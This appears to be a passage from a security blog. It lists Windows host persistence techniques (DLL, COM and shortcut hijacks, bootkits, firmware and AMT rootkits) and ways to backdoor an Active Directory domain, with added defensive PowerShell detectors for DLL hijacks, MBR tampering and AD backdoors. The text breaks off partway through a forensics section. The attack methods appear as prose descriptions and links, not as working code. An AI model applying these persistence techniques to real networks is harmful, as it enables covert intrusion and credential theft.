<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7M_bjoQopodYRB4EBdJE0YMMEhsYt5j1JH_NPJX3gYoU2yO_N66ZHoocuR443Rko1He6MyFYF7myCmqVh5E_b4PUkwjRVGsAs7Cq1IMaYB34BQX2eZ1F6hoLp-zZZRWxZqyR7wz6s4fR/s1600/dll-hijack-detector.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq7M_bjoQopodYRB4EBdJE0YMMEhsYt5j1JH_NPJX3gYoU2yO_N66ZHoocuR443Rko1He6MyFYF7myCmqVh5E_b4PUkwjRVGsAs7Cq1IMaYB34BQX2eZ1F6hoLp-zZZRWxZqyR7wz6s4fR/s1600/dll-hijack-detector.jpg" width="400" /></a></td></tr>
</tbody></table>
<br />
Here you can see PlugX in action: it drops a legitimate Kaspersky executable and hijacks its DLL loads with its own DLL. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOF5a4wSeibVP_MzsWK7HwNX4i8YdFLqZpV7ubDrUQALyTsGH6_hmHXM-4HtBZgwl_zkj8YweH6pD3lhs7xfR3MmhCWpuzN2Eg38xRTULEB8Um5rfZvg-DvsZ04zCmD8Cs3UWH_05Ac1kN/s1600/Screen+Shot+2017-07-05+at+20.22.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1405" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOF5a4wSeibVP_MzsWK7HwNX4i8YdFLqZpV7ubDrUQALyTsGH6_hmHXM-4HtBZgwl_zkj8YweH6pD3lhs7xfR3MmhCWpuzN2Eg38xRTULEB8Um5rfZvg-DvsZ04zCmD8Cs3UWH_05Ac1kN/s640/Screen+Shot+2017-07-05+at+20.22.14.png" width="640" /></a></div>
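<div style="text-align: justify;">
A run-time check for the hijack pattern above, added here as an example (not code from the original post or from the linked detector): it reports DLLs that share a name with a System32 DLL but were loaded from outside the Windows directory, which is the footprint the PlugX case above leaves in a process's module list. The name allow-list is an assumption.</div>
```powershell
# Added example, not code from the post or from the linked detector. Walks the
# module list of every process and reports DLLs that have the same file name
# as one in System32 but were loaded from somewhere outside the Windows
# directory. Run from an elevated shell to see other users' processes.

function Get-SuspiciousDllLoad {
    param(
        # Assumed allow-list: redistributables that applications legitimately
        # ship next to their own EXE; extend it from your own baseline.
        [string[]]$IgnoreNamePattern = @('^api-ms-win-', '^msvc[pr]\d+', '^vcruntime', '^ucrtbase')
    )
    $system32 = Join-Path $env:SystemRoot 'System32'
    $windowsDlls = @{}
    Get-ChildItem -Path $system32 -Filter *.dll -File | ForEach-Object {
        $windowsDlls[$_.Name.ToLowerInvariant()] = $true
    }

    foreach ($proc in Get-Process) {
        # Modules throws for protected processes and for 32-bit processes seen
        # from a 64-bit host (and vice versa); skip those rather than abort.
        try { $modules = $proc.Modules } catch { continue }

        foreach ($mod in $modules) {
            $path = $mod.FileName
            if (-not $path) { continue }
            $name = [System.IO.Path]::GetFileName($path).ToLowerInvariant()
            if (-not $windowsDlls.ContainsKey($name)) { continue }
            # Anything under %SystemRoot% (System32, SysWOW64, WinSxS) is the expected location.
            if ($path.StartsWith($env:SystemRoot, [System.StringComparison]::OrdinalIgnoreCase)) { continue }
            if ($IgnoreNamePattern | Where-Object { $name -match $_ }) { continue }

            $sig = Get-AuthenticodeSignature -FilePath $path
            [PSCustomObject]@{
                ProcessName = $proc.ProcessName
                PID         = $proc.Id
                Module      = $name
                LoadedFrom  = $path
                Signature   = $sig.Status
                Signer      = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            }
        }
    }
}

# Usage: Get-SuspiciousDllLoad | Sort-Object ProcessName | Format-Table -AutoSize
```

A proxying DLL still shows up here even when it forwards every call to the original, because the location, not the behaviour, is what the check keys on.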
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<h3>
</h3>
<h3 style="text-align: justify;">
Hijack a shortcut from the desktop/start menu</h3>
<div style="text-align: justify;">
Never underestimate the power of lame tricks. Just create an executable which calls the original executable and meanwhile starts your backdoor. Replace the link, PROFIT! And don't be a skiddie, check the icon ;) I have seen this trick used by browser-hijacking adware many times.<br />
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2Fw3hc36c77SNAL1YML1cWJSAKcfOtmYAHAj6imMshaAUTjcAeX6ZNd1WuL2mAX03_FjoZblSxyW5K3iOSaUVYz89knTxFjYAlchsuqnnsizPYG9JispILhyF8X2bQRJeZihoALognV0/s1600/ie.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="373" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2Fw3hc36c77SNAL1YML1cWJSAKcfOtmYAHAj6imMshaAUTjcAeX6ZNd1WuL2mAX03_FjoZblSxyW5K3iOSaUVYz89knTxFjYAlchsuqnnsizPYG9JispILhyF8X2bQRJeZihoALognV0/s1600/ie.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IE hijacked to start with http://tinyurl.com/2fcpre6</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
File association hijack</h3>
</div>
<div>
<div style="text-align: justify;">
Choose the user's favorite file type, replace the program which handles the opening with a similar one described in the previous section, and voila!</div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3>
</h3>
<h3 style="text-align: justify;">
COM object hijack</h3>
<div style="text-align: justify;">
The main idea is that certain COM objects are looked up (by CLSID) every time particular applications start; if a registration for that CLSID is present, the DLL it points to is loaded automatically. See <a href="https://blog.gdatasoftware.com/blog/article/com-object-hijacking-the-discreet-way-of-persistence.html" target="_blank">COMpfun</a> for details.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Windows Application Compatibility - SHIM</h3>
<div style="text-align: justify;">
Not many people are familiar with Windows Application Compatibility and how it works. Think about it as an added layer between applications and the OS. If the application matches a certain condition (e.g. filename), certain actions will take place. E.g. emulation of directories, registry entries, DLL injection, etc. In my installation, there are 367 different compatibility fixes (type of compatibility "simulation"), and some of those can be customized.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NGX39oyWT6YJ2PsxTHgIQzRlnzlgUl-WLcNKva_IMDYmL03XQUE29iYhmd9s9W5J1len50X2fe-iMmb10UA1BPl4IuLrm6evylSJ0x2IWIcsAh23yjEk9ZcAF55XFUtmb54JAjTdmjji/s1600/sdb.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4NGX39oyWT6YJ2PsxTHgIQzRlnzlgUl-WLcNKva_IMDYmL03XQUE29iYhmd9s9W5J1len50X2fe-iMmb10UA1BPl4IuLrm6evylSJ0x2IWIcsAh23yjEk9ZcAF55XFUtmb54JAjTdmjji/s1600/sdb.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Every time IE starts, inject a DLL into IE</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Bootkits </h2>
<div>
<div style="text-align: justify;">
Although the bootkits shown here can end up in the Drivers section of Autoruns (as they might need a driver at the end of the day), I still think they deserve a separate section.<br />
<br /></div>
</div>
<div>
<h3 style="text-align: justify;">
MBR - Master boot record</h3>
<div style="text-align: justify;">
Malware can overwrite the Master Boot Record, start the boot process with its own code, and then continue the boot process with the original one. It is common for rootkits to fake the content of the MBR and show the original contents to the running OS. This means one has to attach the infected HDD to a clean system and compare the first 512 bytes (or more in some cases) with a known, clean state, or with the contents shown from the infected OS. SecureBoot can be used to prevent malware infections like this.</div>
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicjMNgWdKRpGhmURUKef1dd06RvHvf0SezQ-gkZ27gNLX0kyw2Z-30rah2oEavuQdQCuHMSbTuZT65KGlc-FxH6N9MmJ9t4B8XfUtWhdVqxBsz-CLCYGUL6nTaj6ErEo7St2p6r00Tqa4y/s1600/mbr.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="129" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicjMNgWdKRpGhmURUKef1dd06RvHvf0SezQ-gkZ27gNLX0kyw2Z-30rah2oEavuQdQCuHMSbTuZT65KGlc-FxH6N9MmJ9t4B8XfUtWhdVqxBsz-CLCYGUL6nTaj6ErEo7St2p6r00Tqa4y/s1600/mbr.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;">There is a slight difference when MBR is viewed from infected OS vs clean OS</td></tr>
</tbody></table>
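<div style="text-align: justify;">
The comparison described above, added here as an example (not code from the original post): it reads the first 512 bytes from a disk or a raw dump, splits them into bootstrap code, partition table and signature, and reports where two such reads differ. The file names in the usage line are placeholders.</div>
```powershell
# Added example, not code from the post. Reads the first 512 bytes of a disk or
# of a raw dump, parses the MBR layout, and compares two reads byte by byte,
# e.g. one taken from inside the suspect OS and one taken with the drive
# attached to a clean analysis machine.

function Read-Mbr {
    param(
        # '\\.\PhysicalDrive0' needs an elevated shell; a file path works for dumps.
        [Parameter(Mandatory)][string]$Path
    )
    $stream = [System.IO.File]::Open($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
    try {
        $buffer = New-Object byte[] 512
        $count = $stream.Read($buffer, 0, 512)
        if ($count -ne 512) { throw "Short read: got $count bytes from $Path" }
        return ,$buffer   # the comma keeps the byte[] as one object on the pipeline
    } finally { $stream.Dispose() }
}

function Get-MbrSummary {
    param([Parameter(Mandatory)][byte[]]$Mbr)
    # Bytes 0..445 hold the bootstrap code, 446..509 the four 16-byte partition
    # entries, 510..511 the 0x55AA signature. On GPT disks the code is usually
    # zero and entry 0 is a protective 0xEE partition.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $codeHash = ([System.BitConverter]::ToString($sha.ComputeHash($Mbr, 0, 446))) -replace '-', ''
    $sha.Dispose()
    $partitions = foreach ($i in 0..3) {
        $o = 446 + 16 * $i
        [PSCustomObject]@{
            Index    = $i
            Bootable = ($Mbr[$o] -eq 0x80)
            Type     = '0x{0:X2}' -f $Mbr[$o + 4]
            StartLba = [System.BitConverter]::ToUInt32($Mbr, $o + 8)
            Sectors  = [System.BitConverter]::ToUInt32($Mbr, $o + 12)
        }
    }
    [PSCustomObject]@{
        ValidSignature = ($Mbr[510] -eq 0x55) -and ($Mbr[511] -eq 0xAA)
        CodeSha256     = $codeHash
        Partitions     = $partitions
    }
}

function Compare-Mbr {
    param(
        [Parameter(Mandatory)][byte[]]$Reference,   # known clean, or read from the clean machine
        [Parameter(Mandatory)][byte[]]$Suspect      # read from inside the suspect OS
    )
    $ref = Get-MbrSummary -Mbr $Reference
    $sus = Get-MbrSummary -Mbr $Suspect
    $findings = New-Object System.Collections.Generic.List[string]

    if (-not $sus.ValidSignature) { $findings.Add('suspect MBR lacks the 0x55AA signature') }
    if ($ref.CodeSha256 -ne $sus.CodeSha256) {
        $changed = @(0..445 | Where-Object { $Reference[$_] -ne $Suspect[$_] })
        $findings.Add("bootstrap code differs in $($changed.Count) bytes, first at offset $($changed[0])")
    }
    foreach ($i in 0..3) {
        $a = $ref.Partitions[$i]
        $b = $sus.Partitions[$i]
        if ($a.Type -ne $b.Type -or $a.StartLba -ne $b.StartLba -or $a.Sectors -ne $b.Sectors -or $a.Bootable -ne $b.Bootable) {
            $findings.Add("partition entry $i differs: $($a.Type)/$($a.StartLba)/$($a.Sectors) vs $($b.Type)/$($b.StartLba)/$($b.Sectors)")
        }
    }
    [PSCustomObject]@{
        Identical = ($findings.Count -eq 0)
        Findings  = $findings.ToArray()
    }
}

# Usage (placeholder paths; one dump from each side, as the post describes):
# Compare-Mbr -Reference (Read-Mbr 'D:\case\mbr-clean-view.bin') -Suspect (Read-Mbr 'D:\case\mbr-infected-view.bin')
```

A rootkit that filters reads of the boot sector only affects the dump taken from inside the infected OS, so the two views being identical is the interesting result only if the clean-side dump was really taken on a clean system.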
<h3 style="text-align: justify;">
VBR - Volume boot record</h3>
<div style="text-align: justify;">
This is the next logical step where malware can start its code, and some malware/rootkits prefer to hide their startup code here. Check <a href="http://arstechnica.com/security/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/1/" target="_blank">GrayFish</a> for details. SecureBoot can be used to prevent malware infections like this.<br />
<br /></div>
<h3 style="text-align: justify;">
BIOS/UEFI malware</h3>
<div>
<div style="text-align: justify;">
Both the old BIOS and the new UEFI can be modified in a way that malware starts even before the OS has a chance to run. Although UEFI was meant to be more secure than BIOS, implementation and design errors happen. Check the <a href="http://securelist.com/analysis/publications/58278/absolute-computrace-revisited/" target="_blank">Computrace anti-theft rootkit</a> for details.<br />
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Hypervisor - Ring -1 rootkit</h3>
</div>
<h3>
</h3>
<div style="text-align: justify;">
This is somewhat special: I believe a rootkit can run in this layer, but on an average physical machine it cannot persist only in this layer, because it won't survive a reboot (<a href="http://blackhat.com/presentations/bh-usa-06/BH-US-06-Rutkowska.pdf" target="_blank">see Rutkowska's presentation from 2006</a>). But because the hypervisor can intercept the restart event, it can write itself into one of the other layers (e.g. install a common kernel driver) and simply delete that component once it is fully functional again after the reboot. Update: there is a good paper from Igor Korkin about hypervisor detection <a href="http://igorkorkin.blogspot.ru/2015/05/two-challenges-of-stealthy-hypervisors.html" target="_blank">here</a>.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
SMM (System Management Mode) malware - Ring -2 rootkit</h3>
<div>
<div style="text-align: justify;">
Somewhat related to the previous type of attack, but not many people know that <a href="http://en.wikipedia.org/wiki/System_Management_Mode#Problems" target="_blank">System Management Mode can be used to inject code into the OS</a>. Check the DEITYBOUNCE malware for more details ;) Also, abusing <a href="https://www.acsac.org/2014/workshops/mmf/Tamas%20Lengyel-Pitfalls%20of%20virtual%20machine%20introspection%20on%20modern%20hardware.pdf" target="_blank">Intel Dual Monitor Mode (DMM)</a>, which basically monitors SMM, can lead to untrusted code execution.</div>
<div style="text-align: justify;">
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
Intel® Active Management Technology - Ring -3 rootkit</h3>
</div>
<div>
<div style="text-align: justify;">
According to Wikipedia, "Intel Active Management Technology (AMT) is hardware and firmware technology for remote out-of-band management of personal computers, in order to monitor, maintain, update, upgrade, and repair them". You might ask: what could possibly go wrong? See <a href="http://invisiblethingslab.com/resources/bh09usa/Ring%20-3%20Rootkits.pdf" target="_blank">Alexander Tereshkin's and Rafal Wojtczuk's great research</a> on this, or <a href="http://people.kth.se/~maguire/DEGREE-PROJECT-REPORTS/100402-Vassilios_Ververis-with-cover.pdf" target="_blank">Vassilios Ververis' thesis about AMT</a>. </div>
<div style="text-align: justify;">
As not many people click on links, let me quote the scary stuff about AMT:</div>
</div>
</div>
<div>
<div>
<ul>
<li style="text-align: justify;">Independent of the main CPU</li>
<li style="text-align: justify;">Can access host memory via DMA (with restrictions)</li>
<li style="text-align: justify;">Dedicated link to NIC, and its filtering capabilities</li>
<li style="text-align: justify;">Can force host OS to reboot at any time (and boot the system from the emulated CDROM)</li>
<li style="text-align: justify;">Active even in S3 sleep!</li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
<h2>
</h2>
<h2 style="text-align: justify;">
Other stuff</h2>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Create new user, update existing user, hidden admins</h3>
</div>
<div>
<div style="text-align: justify;">
Sometimes one does not even have to add malicious code to the system, as valid user credentials are more than enough. Either existing users can be used for this purpose, or new ones can be created. E.g. a well-known trick is to use the Support account with RID 500 - see <a href="http://xangosec.blogspot.com/2013/06/trojanizing-windows.html" target="_blank">here</a>, and the Metasploit module <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_support_account.rb" target="_blank">here</a>.<br />
<br /></div>
</div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Esoteric firmware malware</h3>
<div style="text-align: justify;">
Almost any component in a computer runs firmware, and by replacing that firmware with a malicious one, it is possible to start the malware from there. E.g. HDD firmware (see <a href="http://arstechnica.com/security/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/1/" target="_blank">GrayFish</a> again), graphics card, etc.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Hidden boot device</h3>
<div style="text-align: justify;">
Malware can hide on one of the boot devices which are checked before the regular OS is loaded; once the malware is running, it can load the victim OS itself.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3>
Network-level backdoor</h3>
<div style="text-align: justify;">
Think about the following scenario: every time the OS boots, it loads additional data from the network. It can check for new software updates, configuration updates, etc. Whenever such a software/configuration update is fetched in a vulnerable way, the malware injects itself into the response and gets executed. I know, this level of persistence is not foolproof, but still, it is possible. Think about the recently discovered <a href="https://labs.mwrinfosecurity.com/blog/2015/04/02/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/" target="_blank">GPO MiTM attack</a>, the <a href="https://github.com/infobyte/evilgrade" target="_blank">Evilgrade</a> tool, or even the <a href="https://www.blackhat.com/presentations/bh-dc-08/Oberheide/Whitepaper/bh-dc-08-oberheide-WP.pdf" target="_blank">Xensploit</a> tool when we are talking about VM migration.<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Software vulnerability</h3>
<div style="text-align: justify;">
Almost any kind of software vulnerability can be used as a persistent backdoor. Especially, if the vulnerability can be accessed remotely via the network, without any user interaction. Good old MS08-067...<br />
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
Hardware malware, built into the chipset</h3>
<div style="text-align: justify;">
I am not sure what to write here. Ask your local spy agency for further information. Good luck finding those!<br />
<br /></div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
More links</h3>
<div>
Tools I highly recommend:</div>
<div>
<ul>
<li><a href="https://technet.microsoft.com/en-us/sysinternals/bb545027.aspx" target="_blank">Sysinternals Autoruns</a></li>
<li><a href="http://www.gmer.net/" target="_blank">GMER</a></li>
<li><a href="http://digital-forensics.sans.org/blog/2015/03/25/detecting-dll-hijacking-on-windows/" target="_blank">DLL hijack detector</a></li>
<li>PCHunter</li>
<li><a href="https://www.mandiant.com/resources/download/redline" target="_blank">Mandiant Redline</a></li>
<li><a href="https://github.com/volatilityfoundation" target="_blank">Volatility</a></li>
<li><a href="https://github.com/davehull/Kansa/" target="_blank">Kansa</a></li>
</ul>
</div>
<div style="text-align: justify;">
For more information, check this blog post, <a href="http://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services" target="_blank">part 1</a>, <a href="http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" target="_blank">part 2</a><br />
<br />
Update 2017-04-29: A very nice list of Office persistence: <a href="https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/">https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/</a><br />
<br />
Update 2017-10-23: Persistence via Security Descriptors and ACLs: <a href="https://www.youtube.com/watch?v=SeR4QJbaNRg">https://www.youtube.com/watch?v=SeR4QJbaNRg</a><br />
<br />
Update 2018-07-25: Backdooring LAPS <a href="https://rastamouse.me/2018/03/laps---part-1/">https://rastamouse.me/2018/03/laps---part-1/</a><br />
<a href="https://rastamouse.me/2018/03/laps---part-2/" target="_blank">https://rastamouse.me/2018/03/laps---part-2/ </a><br />
<br />
I would like to thank Gabor Pek from CrySyS Lab for reviewing and completing this post.</div>
</div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com9tag:blogger.com,1999:blog-7429675726481888518.post-29966826301847538802015-03-05T22:04:00.000+01:002019-10-08T15:40:29.315+02:00Thousand ways to backdoor a Windows domain (forest)<div style="text-align: left;">
<div style="text-align: justify;">
When the Kerberos elevation of privilege vulnerability (CVE-2014-6324 / MS14-068) was made public, the remediation paragraph of the following blog post made some waves:<br />
<a href="http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx">http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx</a><br />
<br />
"The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain."<br />
<br />
Personally, I agree with this, but .... But whether this is the real solution, I'm not sure. And the same applies to compromised computers. When it has been identified that malware was able to run on the computer (e.g. scheduled scan found the malware), there is no easy way to determine with 100% certainty that there is no rootkit on the computer. Thus rebuilding the computer might be a good thing to consider. For paranoids, use new hardware ;)<br />
<br />
But rebuilding a single workstation and rebuilding a whole domain is not on the same complexity level. Rebuilding a domain can take weeks or months (or years, which will never happen, as the business will close before that).<br />
<br />
There are countless documented methods to backdoor a computer, but I have never seen a post where someone collects all the methods to backdoor a domain. In the following, I will refer to domain admin, but in reality, I mean Domain Admins, Enterprise Admins, and Schema Admins.<br />
<br />
<br />
<h3>
Ways to backdoor a domain</h3>
So here you go, an incomplete list to backdoor a domain:<br />
<br />
<ul>
<li>Create a new domain admin user. Easy to do, easy to detect, easy to remediate</li>
<li>Dump password hashes. The attacker can either crack those or just pass-the-hash. Since KB2871997, pass-the-hash might be trickier (<a href="https://technet.microsoft.com/library/security/2871997">https://technet.microsoft.com/library/security/2871997</a>), but not impossible. Easy to do, hard to detect, hard to remediate - just think about service user passwords. And during remediation, consider all passwords compromised, even strong ones.</li>
<li>Logon scripts - modify the logon scripts and add something malicious in it. Almost anything detailed in this post can be added :D</li>
<li>Use an already available account, and add domain admin privileges to that. Reset its password. Mess with current group memberships - e.g. <a href="http://www.exploit-db.com/papers/17167/">http://www.exploit-db.com/papers/17167/</a></li>
<li>Backdoor any workstation where domain admins login. While remediating workstations, don't forget to clean the roaming profile. The type of backdoor can use different forms: malware, local admin, password (hidden admin with 500 RID), sticky keys, etc.</li>
<li>Backdoor any domain controller server. For advanced attacks, see <a href="https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150117" target="_blank">Skeleton keys </a></li>
<li>Backdoor files on network shares which are commonly used by domain admins by adding malware to commonly used executables - <a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank">Backdoor factory</a></li>
<li>Change ownership/permissions on AD partitions - if you have particular details on how to do this specifically, please comment</li>
<li>Create a new domain user. Hide admin privileges with SID history. Easy to do, hard to detect, easy to remediate - check <a href="https://github.com/gentilkiwi/mimikatz" target="_blank">Mimikatz </a>experimental for addsid</li>
<li><a href="http://rycon.hu/papers/goldenticket.html" target="_blank">Golden tickets</a> - easy to do, hard to detect, medium remediation</li>
<li><a href="http://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html" target="_blank">Silver tickets</a> - easy to do, hard to detect, medium/hard remediation</li>
<li>Backdoor workstations/servers via group policy</li>
<ul>
<li>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce,</li>
<li>scheduled tasks (run task 2 years later),</li>
<li><a href="http://www.labofapenetrationtester.com/2012/05/fun-with-sticky-keys-utilman-and.html" target="_blank">sticky-keys with debug</a></li>
</ul>
<li><a href="https://www.youtube.com/watch?v=Mz9Bg9KAKBs" target="_blank">Backdoor patch management tool</a>, see <a href="https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf" target="_blank">slides here</a></li>
</ul>
<div>
[Update 2017.01.10]</div>
<ul>
<li>Assign <a href="http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" target="_blank">SeEnableDelegationPrivilege</a> to a user </li>
<li><a href="https://adsecurity.org/?p=1714" target="_blank">Directory Service Restore Mode (DSRM)</a></li>
<li><a href="https://adsecurity.org/?p=1760" target="_blank">Malicious Security Support Provider (SSP)</a></li>
<li><a href="https://adsecurity.org/?p=1785" target="_blank">DSRMv2</a></li>
<li><a href="https://adsecurity.org/?p=1906" target="_blank">AdminSDHolder</a></li>
<li><a href="https://adsecurity.org/?p=2716" target="_blank">Edit GPO</a> </li>
</ul>
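<div style="text-align: justify;">
Three queries a responder can run against the list above, added here as an example (not code from the original post): they surface SID history pointing at privileged groups, the RID 500 account under whatever name it currently has, and write access on AdminSDHolder held by principals outside an expected set. The RSAT ActiveDirectory module is assumed, and the expected-principal list is a starting point, not a complete default baseline.</div>
```powershell
# Added example, not code from the post. Requires the RSAT ActiveDirectory
# module (Import-Module also creates the AD: drive used for Get-Acl below).

Import-Module ActiveDirectory

function Get-SidHistoryFinding {
    $domain  = Get-ADDomain
    $domSid  = $domain.DomainSID.Value
    $rootSid = (Get-ADDomain -Identity (Get-ADForest).RootDomain).DomainSID.Value
    # Domain Admins (512), Schema Admins (518), Enterprise Admins (519), BUILTIN\Administrators
    $privileged = @("$domSid-512", "$rootSid-518", "$rootSid-519", 'S-1-5-32-544')

    Get-ADObject -LDAPFilter '(sIDHistory=*)' -Properties sIDHistory, whenChanged |
        ForEach-Object {
            $history = @($_.sIDHistory | ForEach-Object { "$_" })
            [PSCustomObject]@{
                Name        = $_.Name
                ObjectClass = $_.ObjectClass
                WhenChanged = $_.whenChanged
                SidHistory  = ($history -join ';')
                # A migration leaves SIDs of the *old* domain behind; a SID from
                # this very domain, let alone an admin group SID, is the addsid case.
                SameDomain  = [bool]($history | Where-Object { $_ -like "$domSid-*" })
                Privileged  = [bool]($history | Where-Object { $privileged -contains $_ })
            }
        }
}

function Get-Rid500Account {
    # The built-in Administrator keeps RID 500 whatever it is renamed to, so look
    # it up by SID rather than by name and check whether the name still matches.
    $domSid = (Get-ADDomain).DomainSID.Value
    Get-ADUser -Identity "$domSid-500" -Properties Enabled, LastLogonDate, PasswordLastSet, whenChanged |
        Select-Object Name, SamAccountName, Enabled, LastLogonDate, PasswordLastSet, whenChanged
}

function Get-AdminSdHolderWriteAce {
    param(
        # Assumed baseline of principals expected to hold write rights here;
        # compare the output against a known-good export of your own forest.
        [string[]]$ExpectedPrincipal = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    )
    $domain = Get-ADDomain
    $root   = Get-ADDomain -Identity (Get-ADForest).RootDomain
    $ExpectedPrincipal += "$($domain.NetBIOSName)\Domain Admins", "$($root.NetBIOSName)\Enterprise Admins"
    $writeMask = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty'

    $acl = Get-Acl -Path "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.ActiveDirectoryRights -band $writeMask) -and
            ($ExpectedPrincipal -notcontains $_.IdentityReference.Value)
        } |
        Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited
}

# Usage:
# Get-SidHistoryFinding | Where-Object { $_.Privileged -or $_.SameDomain } | Format-Table -AutoSize
# Get-Rid500Account
# Get-AdminSdHolderWriteAce | Format-Table -AutoSize
```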
<br />
<br />
<h3>
Other tricks</h3>
The following list does not fit in the previous "instant admin" tips, but still, it can make the attacker's life easier if their primary foothold has been disabled:<br />
<br />
<ul>
<li>Backdoor recent backups - and when the backdoor is needed, destroy the files, so the files will be restored from the backdoored backup</li>
<li>Backdoor the Exchange server - get a copy of emails</li>
<li>Backdoor workstation/server golden image</li>
<li>Change permission of logon scripts to allow modification later</li>
<li>Place malicious symlinks to file shares, collect hashes via SMB auth tries on specified IP address, grab password hashes later</li>
<li>Backdoor remote admin management e.g. HP iLO - e.g. create new user or steal current password</li>
<li>Backdoor files e.g. on shares to use in SMB relay</li>
<li>Backdoor source code of in-house-developed software</li>
<li>Use any type of sniffed or reused passwords in new attacks, e.g. network admin, firewall admin, VPN admin, AV admin, etc.</li>
<li>Change the content of the proxy pac file (change browser configuration if necessary), including special exception(s) for a chosen domain(s) to use proxy on malicious IP. Redirect the traffic, enforce authentication, grab password hashes, ???, profit.</li>
<li>Create high privileged users in applications running with high privileges, e.g. MSSQL, Tomcat, and own the machine, impersonate users, grab their credentials, etc. The typical pentest path made easy.</li>
<li>Remove patches from servers, change patch policy not to install those patches.</li>
<li>Steal Windows root/intermediate CA keys</li>
<li>Weaken AD security by changing group policy (e.g. re-enabling LM-hashes)</li>
</ul>
Update [2015-09-27]: I found this <a href="https://www.youtube.com/watch?v=w6761-NWmj4" target="_blank">great presentation</a> from Jakob Heidelberg. It mentions (at least) the following techniques, which are worth checking:<br />
<ul>
<li>Microsoft Local Administrator Password Solution</li>
<li>Enroll virtual smart card certificates for domain admins</li>
</ul>
<br />
<h3>
Forensics</h3>
<div>
If you have been chosen to remediate a network where attackers gained domain admin privileges, well, you have a lot of things to look for :)</div>
<div>
<br /></div>
<div>
I can recommend two tools which can help you during your investigation:</div>
<div>
<br />
<ul>
